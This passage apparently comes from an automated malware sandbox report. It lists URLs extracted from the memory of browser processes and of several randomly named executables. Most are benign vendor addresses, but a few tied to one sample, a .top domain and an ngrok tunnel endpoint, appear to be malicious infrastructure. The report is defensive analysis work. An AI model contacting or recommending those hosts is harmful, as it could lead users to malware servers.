                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 00000030.00000003.3135955802.000001E5802F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000030.00000003.3108396248.000001E5802F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3135955802.000001E5802F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000030.00000003.3108396248.000001E5802F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3135955802.000001E5802F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-04/schema#
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-06/schema#
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#-
                          Source: firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3067432379.000001E57D77A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org
                          Source: firefox.exe, 0000001A.00000003.2896861944.0000018D7CDD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2901646461.0000018D7E5C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2899689547.0000018D7CDD4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2896861944.0000018D7CDCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2994713979.000001E575EBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3143732764.000001E57D364000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3106648735.000001E5803DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3151062965.000001E577BB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3114762559.000001E5749A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3009151915.000001E575EBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3072593750.000001E57D4C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2991447888.000001E575D65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3087830094.000001E57D4D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3105812640.000001E580657000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2991388237.000001E575D6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3019214712.000001E575E54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3143732764.000001E57D394000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3234358102.000001E575CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2989000662.000001E575CA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2989000662.000001E575C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2990821035.000001E575D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: firefox.exe, 00000030.00000003.2988289732.000001E575BF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2991388237.000001E575D6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2990821035.000001E575D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.cc
                          Source: firefox.exe, 00000030.00000003.2988872379.000001E575B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2991258856.000001E575DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2990293404.000001E575DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
                          Source: firefox.exe, 00000030.00000003.3036937184.000001E57F436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-update
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
                          Source: firefox.exe, 00000030.00000003.2985143571.000001E571F92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2985143571.000001E571F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2980233934.000001E571FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3024199512.000001E574A63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2985143571.000001E571F4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2976595956.000001E575073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: firefox.exe, 00000021.00000002.2926765449.000001F3C433D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2897671519.000001F3C433D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2899687108.000001F3C433D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2924433202.000001F3C3BA0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.videolan.org/x264.html
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: 7b9f3f6834.exe, 00000009.00000003.2698396530.0000000005ECD000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2875517251.0000000005E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
                          Source: firefox.exe, 00000030.00000003.3135955802.000001E580226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                          Source: firefox.exe, 0000001A.00000003.2819477848.0000018D7271E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2818931962.0000018D74800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2820218486.0000018D7273A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2822012559.0000018D72773000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2821424363.0000018D72757000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 00000030.00000003.3224140114.000001E578A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/settings/clients
                          Source: firefox.exe, 00000030.00000003.3216045524.000001E57D3E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.comK
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D394000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3130961080.000001E576581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
